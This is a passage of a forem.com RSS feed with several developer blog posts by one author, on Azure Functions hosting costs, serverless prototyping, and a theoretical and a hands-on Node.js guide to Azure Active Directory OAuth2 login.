&lt;p&gt;As we scale up, the cost per user stays roughly the same: Supporting 1.000 users in our scenario would cost 34,11€ which is 3,4 cents per user, 10.000 users would cost us 390,97€ which is roughly 4 cents per user, and 100.000 users would be 3.961,55€ with again is roughly 4 cents per user.&lt;/p&gt;

&lt;h2&gt;
  
  
  Calculating storage cost
&lt;/h2&gt;

&lt;p&gt;But don't forget: We are not yet done. There is still the storage. Remember, we had two parts in there: A blob storage to store static files and a table storage to store persistent data. Both storages have the same pricing model. You are paying once for the amount of data you've stored (in GB) and second for the amount of CRUD transactions you did on that data (in 10.000 operations).&lt;br&gt;
For the Blob storage, you pay 0.0166€ per GB per month (in a "hot", meaning very fast access level), as well as 0.004€ per 10.000 read operations and 0.0456€ per 10.000 write operations. &lt;br&gt;
Let's say we're having 4 sites, per site 15 static assets that get loaded, that our whole frontend asset base has a size of 100 MB and that we update four times a month. An average user visits all 4 sites per session, and has the option to upload a profile picture which he of course does. Assume that an unoptimized 4k profile pic has 3.5 MB of data. The profile pic is loaded with every change of the users site and gets re-set once a month. &lt;br&gt;
With these assumptions and the fact that we support 500 users that browse our site twice a day, we would have: 0.3€ for hosting roughly 2 GB of assets, 0.07€ for loading the pages and 0.02€ for re-deploying our front-end and storing the user profile pictures, adding up to 0.39€ for file storage.&lt;/p&gt;

&lt;p&gt;Azure table storage has the same metrics, yet different prices. Per GB of data you pay 0,0591€ (in a locally redundant storage, which should be enough for our case) as well as 0.000304€ per 10.000 transactions, regardless of their type. Let's say we host a user database where every entry has 0.5 kb of data (thats roughly 10 columns of 15-char-strings) and where an entry is changed once a month. Furthermore we log everything our users do with a size of 0.05 kb of every log entry. We furthermore have four databases where a user on average stores a hundred elements at 1 kb of data each and which a user accesses for all his entries once per session (imagine a To-Do list of something like that). Let's add that up with our 500 users: We'll pay 0.18€ for 3 GB of data storage as well as 1.97€ for over 64.3 million transactions per month, adding up to 2.15€ in database costs.&lt;/p&gt;

&lt;p&gt;Let's put that all together: We've built a killer app and managed to convert 500 users to use it on a daily basis. Per month we're paying 14.17€ for hosting our servers, 2.15€ for hosting and maintaining our data and 0.39€ for storing our static files. This adds up for monthly costs of 16.71€ per month on IT infrastructure costs, leading to costs of 0.034€ per user in our system. So for the rough price of a Netflix family subscription you can bring value to 500 users through our Functions app. And the best thing is as our app is built for scalability, growth in usage and your costs would scale linear, making it real easy to calculate your own pricing.&lt;/p&gt;

&lt;h2&gt;
  
  
  That is awesome!
&lt;/h2&gt;

&lt;p&gt;I know, I was thinking just the same when deciding to write this article. But please keep in mind: This approach is meant for when you are starting with your product. You will always have limitations that sooner or later will become a bottleneck in your IT organization and if you don't shift your hosting methods soon enough you'll end up building a lot of technical debt. Here a the most striking limitations you have:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You have a RAM limitation of 1.5 GB per function in the standard plan, meaning RAM-intensive processes like rendering, complex image-refactoring or AI are hard to implement and in every case very slow in execution. &lt;/li&gt;
&lt;li&gt;Your Functions App is very good at scaling, making you vulnerable for DDOS attacks. You can mitigate that risk by putting your App behind an (Azure) Firewall (and Azure has an eye out for you as well by default). &lt;/li&gt;
&lt;li&gt;Your attack surface increases significantly, as you have to protect dozens or hundreds of small functions. You have to validate input, output, access rights and many more in each function you are writing.&lt;/li&gt;
&lt;li&gt;Though Azure Functions scale really well, they don't scale infinitely. Right now, a maximum of 10 VMs can be occupied by your Functions App in the Standard Plan, and these VMs only have a fixed amount of RAM to offer, meaning there exists a hard cap on how much workload a Functions App can handle.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;As already said, these are all risks that could be partially mitigated or worked around, but only at the cost of really tweaking your code base into something that isn't meant for doing that.&lt;br&gt;
Although all the downsides and grumpiness at the end of the article, I hope this article gives you a good introduction how to quickly set up a scalable, reliable and cheap service that you can use to kick-start your product.&lt;/p&gt;

</description>
      <category>serverless</category>
      <category>azure</category>
      <category>prototyping</category>
      <category>startup</category>
    </item>
    <item>
      <title>Why serverless is awesome for prototyping</title>
      <dc:creator>Tobias Urban</dc:creator>
      <pubDate>Sat, 19 Oct 2019 09:53:24 +0000</pubDate>
      <link>https://forem.com/urmade/why-serverless-is-awesome-for-prototyping-46k6</link>
      <guid>https://forem.com/urmade/why-serverless-is-awesome-for-prototyping-46k6</guid>
      <description>&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--yctXtMnz--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/1600/1%2AmzkwdYC7tbRk-RNSMOaZ-w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--yctXtMnz--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/1600/1%2AmzkwdYC7tbRk-RNSMOaZ-w.png" alt="Cost comparison between serverless and traditional computing" width="880" height="672"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;With the rise of Cloud Computing new ways of hosting emerged, putting on-demand compute power instead of hardware limitations in the center of every organizations IT department. What started with Virtual Machines that could be spun up and shut down in minutes to optimize costs has evolved to many new technologies that are now de-facto standards in an ever growing number of organizations. Applications became "cloud native" and organizations were "cloud born" - and if you really managed to dodge these buzzwords until now, I recommend you to read &lt;a href="https://www.infoworld.com/article/3281046/what-is-cloud-native-the-modern-way-to-develop-software.html"&gt;this article&lt;/a&gt; to catch up with what modern IT Infrastructure is all about.&lt;/p&gt;

&lt;h2&gt;
  
  
  Breaking systems down with Microservices
&lt;/h2&gt;

&lt;p&gt;These innovations all had similar goals in mind: Make your infrastructure more flexible and at the same time robust whilst minimizing your costs (remember, in the new world it's all about variable software compute power instead of fixed-priced hardware). Technologies like Docker and Kubernetes arised which made splitting up your application in small building blocks a real thing (this is called Micro-Services, another Buzzword that you can read more about &lt;a href="https://www.nginx.com/learn/microservices/"&gt;here&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;The basic idea behind this: Instead of having one app where every line of code references any other line of code (this is called high cohesion), build multiple modules that have well-defined interfaces that other modules can use (which leads to so-called high coupling). This way, you are more flexible in the way you build your application (you may for example want to build your app front-end in Node and the high-performance calculation in Go) and in the way you scale your app (same example, the frontend may just needs to forward user input so 2GB RAM on one or two machines could be enough, whereas your calculation engine may needs 32GB of RAM and on high traffic should scale to 8 machines). &lt;/p&gt;

&lt;h2&gt;
  
  
  Going even smaller with Nanoservices
&lt;/h2&gt;

&lt;p&gt;And you can spin that idea even further: After Micro-Services followed Nano-Services, with the idea that every deployment you have in your architecture should only do exactly one single thing and is seperated into its own code package. What sounds like the ultimative mess for every IT Admin (and you're not wrong, it has its drawbacks) enables completely new levels of scalability and development flexibility.&lt;/p&gt;

&lt;p&gt;This is where so-called serverless computing shines: If all your workload is split in tiny packages, the compute power becomes nearly irrelevant (as a single function usually doesn't need a lot of compute power) and flexibility becomes the top priority. And this what for example Azure Functions or AWS Lambda promise: You write single distinct functions that can be accessed by other services via API and upload the code into the cloud, and the cloud provider deploys your code "just-in-time" when it is called from another service. You as a developer only pay for the time that your code execution took and for how many times your function was called (usually priced at a few cent per a million calls).&lt;/p&gt;

&lt;p&gt;This leaves us with two exciting things: We have a cheap service to host our application, and we have a lot of scalability that only charges us for how frequently our app is used. This is great for Start-Ups or prototypes where you don't want to overspend on infrastructure, where you usually don't have highly complex logic in your application and where you yet don't know how heavily your app will be utilized.&lt;/p&gt;

&lt;h2&gt;
  
  
  Serverless on everything ... right?
&lt;/h2&gt;

&lt;p&gt;Of couse, not everything is perfect in the serverless world. And it will probably not solve all your problems you ever had with hardware management. The most striking reason against serverless computing comes from its core development ideom: By having thousands of standalone functions in your architecture, you create a huge latency overhead just for routing traffic through your systems. Even if you give all your apps into one datacenter, you still have to route the traffic within the datacenter, and if we think about visiting 20-50 stops before we successfully finished one request, this latency becomes significant  for your response time.&lt;/p&gt;

&lt;p&gt;Most cloud providers also usually offer only standardized VMs on which you can run your functions. For you that means that you have a cap on how much resources one function can consume. Although this shouldn't be an issue for most of your logic, you will have to search for alternatives when it comes to compute-heavy jobs like image transformation or AI calculations. &lt;/p&gt;

&lt;p&gt;One additional thing you have to consider when going serverless: Your attack surface multiplies. A lot. You have to secure every single function, and every function on its own is responsible for validating access control, inputs and outputs. Most providers offer easy and compute-saving methods to handle the authentication part, but still you have to take care of securing every single function in your architecture.&lt;/p&gt;

&lt;p&gt;And as hard as you try, you will almost never end up in a completely serverless way. Think about the following scenario: One of your functions sends out notifications to all of your users mobile devices. This triggers around a million function calls as your app already got quite popular. Absolutely no problem, serverless will handle everything for you and a few seconds later all is done (for probably just a few cents for all messages together). But you have one additional job for them: For logging purposes, your function writes a statement in a SQL database. If you never worked with SQL DBs: Shooting a million concurrent requests at it is a &lt;em&gt;really&lt;/em&gt; bad idea. &lt;br&gt;
So you will have to keep the big picture in mind, and design your architecture around the "weakest link" in your overall architecture. The best individual scalability won't help you a thing if you have one bottleneck that keeps the overall process slow. As a note before you ditch logging forever: there are already services by large cloud providers that even enable serverless storage databases which you can penetrate as much as you want.&lt;/p&gt;

&lt;h2&gt;
  
  
  So when do I use serverless?
&lt;/h2&gt;

&lt;p&gt;Serverless functions have a lot of great use cases. If you have an app idea and you want to quickly test it and get started fast, serverless is a great way to achieve this. You don't have any fixed hardware cost, your app can scale no matter how many people use your app and you are forced into a &lt;a href="https://www.freecodecamp.org/news/a-quick-intro-to-dependency-injection-what-it-is-and-when-to-use-it-7578c84fa88f/"&gt;dependency injection&lt;/a&gt; programming pattern which in the worst case leaves you with a greatly structured monolith if you decide to switch to traditional development.  And the most striking concept still is: You can basically develop your service for free. Most cloud providers offer the first million calls to a function per month for free, which is more than enough to get you started. From here, you can start promoting your app and acquiring users. And as you do, your bills scale proportionally to your users, giving you the chance to scale with your users demand (and probably your income from new and paying users).&lt;/p&gt;

&lt;p&gt;Serverless is also a go-to choice for all kinds of proxies, helper functions and small handlers. If you want to pipe a request from one service to another (e.g. from a queue to a database), serverless got you covered. And you could even automate your IT infrastructure with functions: Just write the REST calls to start / stop / administrate your services as a serverless function, and define protocols in which situation which operations should be applied. And here you go, a fully automated IT infrastructure right at your fingertips. &lt;/p&gt;

&lt;p&gt;Have you ever worked with serverless functions? What did you like, what were your pitfalls?&lt;/p&gt;

</description>
      <category>serverless</category>
      <category>cloud</category>
      <category>devops</category>
      <category>architecture</category>
    </item>
    <item>
      <title>The (hands-on) beginners guide to Azure Active Directory</title>
      <dc:creator>Tobias Urban</dc:creator>
      <pubDate>Thu, 17 Oct 2019 17:44:07 +0000</pubDate>
      <link>https://forem.com/urmade/the-hands-on-beginners-guide-to-azure-active-directory-4ija</link>
      <guid>https://forem.com/urmade/the-hands-on-beginners-guide-to-azure-active-directory-4ija</guid>
      <description>&lt;p&gt;This article aims to give you a reference implementation of how you can log in your users using their existing Azure Active Directory accounts. Are you curious what Azure Active Directory (AAD) is in the first place? Then check out &lt;a href="https://dev.to/urmade/the-theoretical-beginners-guide-to-azure-active-directory-1f5m"&gt;this article&lt;/a&gt; that walks you through the theoretical foundations of AAD.&lt;/p&gt;

&lt;p&gt;You can find the final code of this tutorial &lt;a href="https://github.com/Urmade/AzureActiveDirectoryNodeJSLogin"&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  What we're building
&lt;/h2&gt;

&lt;p&gt;Azure Active Directory is built on industry-standard identity specifications and supports Open ID Connect for modern authentication and authorization. This tutorial will walk you through the OAuth 2.0 authorization code flow, which consists of two basics steps:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;First, you have to redirect your user to a Microsoft hosted login page. Microsoft takes care of receiving, handling and validating user credentials, so you don't have to care about any of that.&lt;/li&gt;
&lt;li&gt;In the second step, Azure Active Directory will send an authorization code to our web server. We take this code and trade it for a JWT token, which then can be used to authorize calls to other Microsoft services like Microsoft Graph, AAD and more.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Getting started
&lt;/h2&gt;

&lt;p&gt;As a prerequisite for this tutorial we will need some kind of server environment to run our code, in this case we chose Node.js. The first thing to do is to set up the server:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;const express = require("express");&lt;br&gt;
const app = express();&lt;br&gt;
const request = require("request");&lt;br&gt;
require("dotenv").config();&lt;br&gt;
//Here goes our code&lt;br&gt;
app.listen(8080);&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;In our first step we have to log in our user and receive a code string that we can trade in for a Bearer token. This tutorial assumes that you have already registered an app in Azure Active Directory, a manual for that can be found &lt;a href="https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app"&gt;here&lt;/a&gt;. To get the code we have to redirect our user to the Microsoft login page (where they then log in with their credentials).&lt;/p&gt;

&lt;p&gt;&lt;code&gt;app.get("/login", (req, res) =&amp;gt; {&lt;br&gt;
res.redirect(&lt;br&gt;
"https://login.microsoftonline.com/" + process.env.TENANT_ID + "/oauth2/v2.0/authorize?" +&lt;br&gt;
"client_id=" + process.env.CLIENT_ID +&lt;br&gt;
"&amp;amp;response_type=code" +&lt;br&gt;
"&amp;amp;redirect_uri=" + process.env.BASE_URL + process.env.REDIRECT_URL +&lt;br&gt;
"&amp;amp;response_mode=query" +&lt;br&gt;
"&amp;amp;state= " +&lt;br&gt;
"&amp;amp;scope=" + process.env.SCOPE&lt;br&gt;
);&lt;br&gt;
})&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;There are a lot of parameters in this URL, so let's walk through them one by one:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;The base url&lt;/code&gt;: We need to call &lt;a href="https://login.microsoftonline.com/*tenant*/oauth2/v2.0/authorize"&gt;https://login.microsoftonline.com/*tenant*/oauth2/v2.0/authorize&lt;/a&gt; to enter our user data. The tenant can be either only our own tenant (e.g. myTenant.onmicrosoft.com) or &lt;code&gt;common&lt;/code&gt;, which means every account that is part of some Active Directory tenant (e.g. thatOtherTenant.onmicrosoft.com) can log into our app. We further specify that we want to use version 2.0 of the REST API (you can find the differences between v1.0 and v2.0 &lt;a href="https://docs.microsoft.com/en-us/azure/active-directory/develop/azure-ad-endpoint-comparison"&gt;here&lt;/a&gt;).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;client_id&lt;/code&gt;: The id of your app that is registered in your AAD tenant&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;response_type&lt;/code&gt;: Specifies what Active Directory will return after a successful login action. For the OAuth 2.0 flow we always use &lt;code&gt;code&lt;/code&gt; to receive the code we can trade for a Bearer token, in the OpenIdConnect flow we would have to use the value id_token.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;redirect_uri&lt;/code&gt;: The url to which AAD will redirect the user when they successfully logged in. This url has to be specified in the app registration and your parameter must match this specified url exactly (including the path, so if you specify &lt;a href="http://www.myapp.com"&gt;www.myapp.com&lt;/a&gt; as a redirect url in Active Directory and &lt;a href="http://www.myapp.com/callback"&gt;www.myapp.com/callback&lt;/a&gt; in your query parameters, the authentication will fail).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;response_mode&lt;/code&gt;: This parameter determines how our access code will be sent back to our app. It can have the values &lt;code&gt;query&lt;/code&gt;, &lt;code&gt;form_post&lt;/code&gt; and &lt;code&gt;fragment&lt;/code&gt;. In our case where we actually redirect the user we can use the query parameter, if we would for example open a pop-up for the user we could also use the form_post to post the code to our app.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;state&lt;/code&gt;: Here you can enter any string you wish. This can be used as a challenge for security reasons or if you want to store some information the user gives to you at the beginning of the authentication flow and that should be given back at the end of the flow.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;scope&lt;/code&gt;: The scopes are the permissions your users will have when they want to call any Microsoft services with the bearer token they receive. You can read more about scopes &lt;a href="https://docs.microsoft.com/en-us/azure/active-directory/develop/consent-framework"&gt;here&lt;/a&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Furthermore there are optional parameters that you can use (if applicable):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;prompt&lt;/code&gt;: Here you can specify what the user will see when they try to log into your app. By default, Active Directory will sign your users in, store a cookie on their device and with every further authorization, it will log the user in silently without showing an additional prompt. With the values &lt;code&gt;login&lt;/code&gt;, &lt;code&gt;consent&lt;/code&gt; and &lt;code&gt;none&lt;/code&gt; you can specify that the user either always sees the login form, that they always have to give consent to the app to use their data before using it or that they never see any form.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;login_hint&lt;/code&gt;: If you already know the email address or user name that your user will take to log in, you can pre-fill this input field in the login mask with the login_hint parameter.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;domain_hint&lt;/code&gt;: As already stated the Azure AD v2.0 endpoint supports login from consumers (private accounts) and organizations likewise. With this parameter you can specify if only organizations or only consumers can log into your app by giving it the value &lt;code&gt;consumers&lt;/code&gt; or &lt;code&gt;organizations&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When our user now logs into the application successfully, our redirect_uri will be called in the format &lt;code&gt;redirect_uri?code=…&lt;/code&gt; . We can now listen to that path from our server and directly use the code to trade in for a token. Therefore we have to use a POST call to Azure AD, and we have to implement functionality on what to do with the token when we received it.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;app.get(process.env.REDIRECT_URL, (req, res) =&amp;gt; {&lt;br&gt;
const authCode = req.query.code;&lt;br&gt;
if (!authCode) {&lt;br&gt;
res.status(500).send("There was no authorization code provided in the query. No Bearer token can be requested");&lt;br&gt;
return;&lt;br&gt;
}&lt;br&gt;
const options = {&lt;br&gt;
method: "POST",&lt;br&gt;
url: "https://login.microsoftonline.com/" + process.env.TENANT_ID + "/oauth2/v2.0/token",&lt;br&gt;
form: {&lt;br&gt;
grant_type: "authorization_code",&lt;br&gt;
code: authCode,&lt;br&gt;
client_id: process.env.CLIENT_ID,&lt;br&gt;
client_secret: process.env.CLIENT_SECRET,&lt;br&gt;
redirect_uri: process.env.BASE_URL + process.env.REDIRECT_URL&lt;br&gt;
}&lt;br&gt;
};&lt;br&gt;
request(options, function (error, response, body) {&lt;br&gt;
if (error) throw new Error(error);&lt;br&gt;
try {&lt;br&gt;
const json = JSON.parse(body);&lt;br&gt;
if (json.error) res.status(500).send("Error occured: " + json.error + "\n" + json.error_description);&lt;br&gt;
else {&lt;br&gt;
res.send(json.access_token);&lt;br&gt;
}&lt;br&gt;
}&lt;br&gt;
catch (e) {&lt;br&gt;
res.status(500).send("The token acquirement did not return a JSON. Instead: \n" + body);&lt;br&gt;
}&lt;br&gt;
});&lt;br&gt;
});&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;The POST call again has a few mandatory parameters that we have to provide to get the Bearer token.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;url&lt;/code&gt;: Similar to the first call we can use either our tenant or the &lt;code&gt;common&lt;/code&gt; endpoint and we can specify to use v1.0 or v2.0. The url has to match the url from the first call.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;grant_type&lt;/code&gt;: Used to specify which kind of grant should be given back, must be &lt;code&gt;authorization_code&lt;/code&gt; to get a Bearer token. You can look up the different grants &lt;a href="https://oauth.net/2/grant-types/"&gt;here&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;code&lt;/code&gt;: Our access code we got from our previous call.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;client_id&lt;/code&gt;: The ID of our app registered in Azure Active Directory.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;client_secret&lt;/code&gt;: A secret given out by Azure Active Directory used to prove that you are the developer of the app.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;redirect_uri&lt;/code&gt;: Usually just the current url, as this is the redirect_uri you have specified in your last call and in AAD.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After we executed or POST call, we get an answer from Active Directory containing a JSON object that has the Bearer token in its parameters. If an error occurred the JSON object has an error attribute where you will receive an error message.&lt;/p&gt;

&lt;p&gt;Now you have everything to authenticate your users and start working with their Microsoft profiles to build apps based on the Microsoft ecosystem. For example, if you gave your app the scope user.read, you can now do a GET request to Microsoft graph to get the users profile information.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;app.get("/me", (req,res) =&amp;gt; {&lt;br&gt;
const options = {&lt;br&gt;
method: "GET",&lt;br&gt;
url: "https://graph.microsoft.com/v1.0/me/",&lt;br&gt;
header: {&lt;br&gt;
Authorization: "Bearer *your-token*"&lt;br&gt;
}&lt;br&gt;
}&lt;br&gt;
request(options, function (error, response, body) {&lt;br&gt;
res.send(body);&lt;br&gt;
})&lt;br&gt;
})&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;You can find the whole code (documented) &lt;a href="https://github.com/Urmade/AzureActiveDirectoryNodeJSLogin"&gt;here&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>identity</category>
      <category>azure</category>
      <category>webdev</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>The (theoretical) beginners guide to Azure Active Directory</title>
      <dc:creator>Tobias Urban</dc:creator>
      <pubDate>Thu, 17 Oct 2019 17:42:31 +0000</pubDate>
      <link>https://forem.com/urmade/the-theoretical-beginners-guide-to-azure-active-directory-1f5m</link>
      <guid>https://forem.com/urmade/the-theoretical-beginners-guide-to-azure-active-directory-1f5m</guid>
      <description>&lt;p&gt;When I started to develop my first small applications, I usually wasn’t concerned too much about security and about how to keep user data safe from exposure. But the deeper I digged into developing apps, the more I figured out how hard it was to design a truly secure way to store sensitive personal data. So I looked for third-party software that could solve this problem for me.&lt;/p&gt;

&lt;p&gt;If you’re searching for identity management providers, one of the first platforms you will find is Active Directory (AD), a tool developed by Microsoft that was first launched in 1999 and since then evolved to the leading Identity and Access Management (IAM) software for enterprises. But although this makes Active Directory a very important skill to cover for software engineers, it also means that the software has to cover a lot of different use cases, making it seem very complex at the start. Therefore I hope to make your start with Active Directory a joy by sharing a walk-through tutorial of the login flow (written in Node.js) and by explaining the underlying concepts of Active directory in the process.&lt;/p&gt;

&lt;p&gt;TL;DR: Is this tutorial suitable for me? Ask yourself these questions:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Do I want to understand how an IAM software works?&lt;/li&gt;
&lt;li&gt;Do I want to explore different Azure Active Directory versions and how they differ?&lt;/li&gt;
&lt;li&gt;Do I want to build a login mechanism with Azure Active Directory?&lt;/li&gt;
&lt;li&gt;Do I want to learn more about OAuth2?&lt;/li&gt;
&lt;li&gt;Do I want to learn how to secure my users sensitive data?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If you can answer any of those questions with “Yes”, this is your tutorial. We will cover the following topics:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;What and why is Active Directory&lt;/li&gt;
&lt;li&gt;The developers opportunity&lt;/li&gt;
&lt;li&gt;Active Directory for everyone with AAD B2C&lt;/li&gt;
&lt;li&gt;OAuth2 in a nutshell&lt;/li&gt;
&lt;li&gt;Where to learn more&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;This tutorial is seperated in two articles: A theoretical introduction to Azure Active Directory (You are here) and a hands-on walk-through. You can find an implementation of how to log your user in with Azure Active Directory &lt;a href="https://github.com/Urmade/AzureActiveDirectoryNodeJSLogin"&gt;in this GitHub repository&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  What and why is Active Directory
&lt;/h2&gt;

&lt;p&gt;So before we start working with Active Directory we should understand what exactly AD actually is. Basically, AD stores all kind of entity information in an organization. That could be for example data about users, groups, devices, organizations or permissions between those entities. So it is far more than just a pure user management platform, although in this tutorial we will only focus on the user management features.&lt;br&gt;
Historically, Active Directory was an On-Premise solution, meaning that every company using this technology had it installed in their own datacenters, completely isolated from all other Active Directories out there. After some time solutions were provided to connect two specific Active Directory tenants with each other, so that the employees from Company A could for example get access to devices of Company B and vice versa. &lt;/p&gt;

&lt;p&gt;With the rise of cloud and Microsoft Azure specifically a new form of AD was provided: Azure Active Directory. Here, all Active Directories are connected with each other, meaning that someone from Company A could for example access an application developed internally at Company B if Company B allows that option in their application (more on how to handle that in the Coding section). This eliminates a lot of configuration overhead and makes it far easier to develop B2B applications as the app developed in your AD tenant can now be accessed by either individual users of another company or can register in the AD tenant of your customer (if you’re interested in that, you can dig deeper into &lt;a href="https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-permissions-and-consent#scopes-and-permissions"&gt;AD scopes&lt;/a&gt; and &lt;a href="https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-permissions-and-consent#permission-types"&gt;delegated vs app permissions&lt;/a&gt;). &lt;/p&gt;

&lt;p&gt;Active Directory tenants that are hosted on-premise, meaning not in Azure, are not accessible by Azure by default but can also connect to the Azure Active Directory via Azure AD Connect to replicate their user data to Azure Active Directory.&lt;/p&gt;

&lt;h2&gt;
  
  
  The developers opportunity
&lt;/h2&gt;

&lt;p&gt;Coming from its long history and its deep integration with the Microsoft ecosystem, Active Directory was the de-facto standard for identity management in companies. And even though on-premise identity management isn't on its prime anymore, a lot of companies stayed with what they know and migrated directly to Azure Active Directory. There are also a lot of reasons to do so even nowadays: Office 365, Dynamics 365 and Azure (the "three clouds" of Microsoft) all work with Azure Active Directory. So whenever you want to use the cloud-hosted Office, you will need an Azure Active Directory account. Also every user with a Microsoft account (for example someone who uses Outlook or has a XBOX account) is also using Azure Active Directory under the hood. &lt;/p&gt;

&lt;p&gt;This makes AAD a huge deal for developers. Especially if you develop an application for the enterprise sector, you often have to argue over how to access data and store user information. By integrating your application in Azure Active Directory, you don't have to store any personal user data (e.g. names), your users have a seamless single-sign-on experience and your customers admins still have control over which users and which data your app can reach out to. This spares you a lot of user management development efforts and makes user adoption a lot easier. &lt;/p&gt;

&lt;h2&gt;
  
  
  Active Directory for everyone with AAD B2C
&lt;/h2&gt;

&lt;p&gt;Active Directory in the first place was a B2B product, designed for companies to handle their internal resources. As more and more companies developed complex B2C apps a new branch of Active Directory was released: Azure Active Directory B2C. While this version was downsized in terms of micro-management of users as well as in its capability to handle resources like devices, rooms and organizations, it came with a lot more features to handle a massive, anonymous amount of users, like self-registration into the active directory via e.g. Facebook, Google, Mail or LinkedIn and advanced features to store custom user metadata. &lt;/p&gt;

&lt;p&gt;Furthermore a new version of the Active Directory login API was released, making it possible to authenticate personal Microsoft Accounts (e.g. outlook or msn email-adresses) into Active Directory applications. Therefore there currently are two options to develop B2C apps with Active Directory: You could use the traditional Azure Active Directory and allow users to log in from any domain (including the public Microsoft Active Directory that holds all @live.com, @outlook.com,... users). Or you use Azure Active Directory B2C to build your own Active Directory instance which holds all the users of you app. This approach holds a lot more benefits like expanding AD with custom metadata, and making it possible for people without a Microsoft account to use your app.&lt;/p&gt;

&lt;h2&gt;
  
  
  OAuth2 in a nutshell
&lt;/h2&gt;

&lt;p&gt;Now that we know a lot more about the "What" of Active Directory, we want to look into the "How". Specifically, how can we authenticate into Azure Active Directory (AAD).&lt;/p&gt;

&lt;p&gt;AAD uses the &lt;a href="https://openid.net/connect/"&gt;OpenID Connect specification&lt;/a&gt; to handle the sign-in process of its users. OpenID Connect is an extension to &lt;a href="https://tools.ietf.org/html/rfc6749"&gt;OAuth 2.0&lt;/a&gt;, which was built to standardize identity verification throughout all systems.  OAuth 2.0 only specifies the &lt;em&gt;Authorization&lt;/em&gt; of users, meaning: How can one user proof that he is allowed to do what he wants to do? Although this is a crucial step in securing Web Apps from malicious access, it still doesn't answer the question: Who is that person that wants to access my app? Therefore, OpenID Connect was written and took care of the &lt;em&gt;Authentication&lt;/em&gt; of users. As OpenID Connect (also called OIDC in short) builds on OAuth2.0, every system that implements OIDC always also implements OAuth2.0.&lt;/p&gt;

&lt;p&gt;The good thing is: We don't have to implement the Authentication part on ourselves when we start with AAD. Although it is a good idea to think about Authentication more deeply in production apps, the core logic of signing users in and looking up who they are is handled by Azure Active Directory for us. We only have to care about Authorization of our users, so getting to do something with their data.&lt;/p&gt;

&lt;p&gt;OAuth2.0 offers a variety of possibilities to authorize your users. The most intuitive one (and the most common for Web Apps) is the &lt;a href="https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow"&gt;authorization code flow&lt;/a&gt;. This flow has two steps: In step 1, you redirect your user to a Microsoft hosted login page, where users can log in with their username/e-mail and password. When the login was successful, we enter step 2: Azure Active Directory sends an authorization code to your application. You now have a proof that your user is signed in, and you can trade this authorization code for a so-called &lt;a href="https://jwt.io/"&gt;JSON Web Token&lt;/a&gt; (JWT). And that JWT can be then used to query services like the Microsoft Graph or Azure Active Directory to receive and manipulate data on behalf of the user that signed in. &lt;/p&gt;

&lt;h2&gt;
  
  
  Where to learn more?
&lt;/h2&gt;

&lt;p&gt;If you want to go into the technical how of this concept, you can check out &lt;a href=""&gt;this article&lt;/a&gt; that walks you through an implementation of the authorization code flow.&lt;/p&gt;

&lt;p&gt;If you already have an existing AAD integration, there is another exiting offer you can use. Microsoft offers a dedicated store just for AAD integrated apps where you can promote your app completely free of charge. To get started, take a look at the &lt;a href="https://docs.microsoft.com/en-us/azure/active-directory/develop/howto-app-gallery-listing"&gt;official documentation&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>identity</category>
      <category>azure</category>
      <category>webdev</category>
      <category>azureactivedirectory</category>
    </item>
    <item>
      <title>Getting started with WebAuthn - The basic flow</title>
      <dc:creator>Tobias Urban</dc:creator>
